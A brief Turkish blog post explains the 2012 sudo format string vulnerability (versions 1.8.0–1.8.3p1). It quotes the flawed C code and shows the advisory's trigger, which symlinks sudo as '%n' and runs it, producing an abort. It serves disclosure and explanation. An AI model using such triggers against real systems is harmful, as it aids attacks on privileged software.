Friday, February 3, 2012

sudo format string vulnerability

Uygulama Güvenliği dünyasını eski zamanlara geri götüren klasik bir format string bug'i bugün yayınlandı. Zafiyet Sudo 1.8.0 - 1.8.3 p1 sürümlerini etkilemekte. Ilginç olan ise sudo gibi kritik bir uygulamada bu basit hatalar ile karşılaşmak.
easprintf(&fmt2, "%s: %s\n", getprogname(), fmt);
va_start(ap, fmt);
vfprintf(stderr, fmt2, ap);
Görüldüğü üzere ftm2 string'ine getprogname() methodu ile argv[0] (yani kodu çalıştıran dosyanın adı oluyor bu C'de) atanıyor. Ardından vprintf ile yazdırılıyor. ln -s /usr/bin/sudo %n yaparak sudo'ya %n isminde bir link oluşturup açığı tetikleyebilirsiniz. -- Zafiyetten alınmıştır bu kısım --
/tmp $ ln -s /usr/bin/sudo %n
/tmp $ ./%n -D9
*** %n in writable segment detected ***
Aborted
/tmp $
Görüldüğü üzere basit hata & kritik durum. Sanırım uygulama güvenliği kavramını iyi özetliyor. Güvenli günler.

Orjinal Advisory:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20120130/2e40de71/attachment-0001.txt

No comments:

Post a Comment